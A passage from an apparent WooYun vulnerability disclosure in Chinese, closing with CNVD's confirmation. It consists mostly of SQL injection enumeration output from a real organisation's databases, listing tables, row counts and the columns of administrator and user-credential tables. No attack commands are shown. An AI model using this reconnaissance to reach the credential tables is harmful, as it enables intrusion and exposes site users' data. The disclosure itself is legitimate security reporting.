| dbo.vw_aspnet_Applications                       | 1       |
| dbo.xcjy_Clue                                    | 1       |
| dbo.xcjy_News                                    | 1       |
| dbo.zgm_DreamHelpGroup                           | 1       |
+--------------------------------------------------+---------+
Database: SD_QIYE
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.BusinessType                                 | 707     |
| dbo.BusinessImage                                | 61      |
| dbo.BusinessImage                                | 61      |
| dbo.usermenus                                    | 52      |
| dbo.menus                                        | 15      |
| dbo.Article_Other                                | 10      |
| dbo.Article_Other                                | 10      |
| dbo.users                                        | 7       |
| dbo.ArticleClass_Other                           | 3       |
| dbo.ArticleClass_Other                           | 3       |
+--------------------------------------------------+---------+
Database: bbs
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Sd_myposts                                   | 2011091 |
| dbo.Sd_mytopics                                  | 1365288 |
| dbo.Sd_topics                                    | 1272042 |
| dbo.Sd_posts3                                    | 874100  |
| dbo.Sd_posts1                                    | 759317  |
| dbo.Sd_topictagcaches                            | 328793  |
| dbo.Sd_posts2                                    | 306686  |
| dbo.Sd_moderatormanagelog                        | 82401   |
| dbo.Sd_users                                     | 54030   |
| dbo.Sd_userfields                                | 54027   |
| dbo.Sd_topictags                                 | 25848   |
| dbo.Sd_attachments                               | 19464   |
| dbo.Sd_myattachments                             | 19249   |
| dbo.Sd_pms                                       | 17092   |
| dbo.Sd_tags                                      | 13859   |
| dbo.Sd_adminvisitlog                             | 11450   |
| dbo.Sd_scheduledevents                           | 8806    |
| dbo.Sd_onlinetime                                | 3713    |
| dbo.Sd_statvars                                  | 1836    |
| dbo.Sd_words                                     | 336     |
| dbo.Sd_polloptions                               | 239     |
| dbo.Sd_ratelog                                   | 224     |
| dbo.Sd_moderators                                | 213     |
| dbo.Sd_smilies                                   | 163     |
| dbo.Sd_favorites                                 | 125     |
| dbo.Sd_endMaJia                                  | 91      |
| dbo.Sd_topictypes                                | 88      |
| dbo.Sd_stats                                     | 87      |
| dbo.Sd_medalslog                                 | 82      |
| dbo.Sd_medalslog                                 | 82      |
| dbo.Sd_endmanager                                | 47      |
| dbo.Sd_polls                                     | 47      |
| dbo.Sd_forumfields                               | 31      |
| dbo.Sd_forums                                    | 31      |
| dbo.Sd_onlinelist                                | 30      |
| dbo.Sd_onlinelist                                | 30      |
| dbo.Sd_help                                      | 29      |
| dbo.Sd_usergroups                                | 29      |
| dbo.Sd_forumlinks                                | 26      |
| dbo.Sd_locations                                 | 17      |
| dbo.Sd_topicidentify                             | 17      |
| dbo.Sd_creditslog                                | 14      |
| dbo.Sd_navs                                      | 11      |
| dbo.Sd_postdebatefields                          | 10      |
| dbo.Sd_paymentlog                                | 9       |
| dbo.Sd_bbcodes                                   | 7       |
| dbo.Sd_attachtypes                               | 6       |
| dbo.Sd_advertisements                            | 5       |
| dbo.Sd_debates                                   | 5       |
| dbo.Sd_searchcaches                              | 5       |
| dbo.Sd_admingroups                               | 4       |
| dbo.Sd_tablelist                                 | 3       |
| dbo.Sd_debatediggs                               | 2       |
| dbo.Sd_postid                                    | 2       |
| dbo.Sd_announcements                             | 1       |
| dbo.Sd_attachpaymentlog                          | 1       |
| dbo.Sd_statistics                                | 1       |
| dbo.Sd_templates                                 | 1       |
+--------------------------------------------------+---------+
Database: jiaju
Table: administrator
[4 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| AdminID   | int      |
| AdminName | varchar  |
| LoginTime | datetime |
| Pwd       | varchar  |
+-----------+----------+
Database: SDSW20_Main
Table: shds_UserInfo
[9 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Address  | nvarchar |
| Code     | nvarchar |
| Desc     | nvarchar |
| Email    | nvarchar |
| ID       | int      |
| RealName | nvarchar |
| Tel      | nvarchar |
| UserName | nvarchar |
| YouBian  | nvarchar |
+----------+----------+
Database: bbs
Table: Sd_users
[46 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| accessmasks   | int           |
| adminid       | int           |
| avatarshowid  | int           |
| bday          | char          |
| credits       | int           |
| digestposts   | smallint      |
| email         | char          |
| extcredits1   | decimal       |
| extcredits2   | decimal       |
| extcredits3   | decimal       |
| extcredits4   | decimal       |
| extcredits5   | decimal       |
| extcredits6   | decimal       |
| extcredits7   | decimal       |
| extcredits8   | decimal       |
| extgroupids   | char          |
| gender        | int           |
| groupexpiry   | int           |
| groupid       | smallint      |
| invisible     | int           |
| joindate      | smalldatetime |
| lastactivity  | datetime      |
| lastip        | char          |
| lastpostid    | int           |
| lastposttitle | nchar         |
| lastvisit     | datetime      |
| newpmcount    | int           |
| newsletter    | int           |
| nickname      | nchar         |
| oltime        | bigint        |
| onlinestate   | int           |
| pageviews     | int           |
| password      | char          |
| pmsound       | int           |
| posts         | int           |
| ppp           | int           |
| regip         | char          |
| salt          | nchar         |
| secques       | char          |
| showemail     | int           |
| sigstatus     | int           |
| spaceid       | int           |
| templateid    | smallint      |
| tpp           | int           |
| uid           | int           |
| username      | nchar         |
+---------------+---------------+
Database: bbs
Table: Sd_endmanager
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| email    | nvarchar |
| password | nvarchar |
| regip    | nvarchar |
| regtime  | datetime |
| uid      | int      |
| username | nvarchar |
+----------+----------+
Database: SDSW20_HR
Table: School_Login
[7 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| answer   | varchar  |
| id       | int      |
| IPAdd    | varchar  |
| question | varchar  |
| regtime  | datetime |
| slname   | varchar  |
| slpwd    | varchar  |
+----------+----------+


2.jpg


只列出部分表的列名,就不dump出来了!~~~否则数据很多,很重要就是了!~~~

漏洞证明:

见详细说明

修复方案:

过滤?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-11 16:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价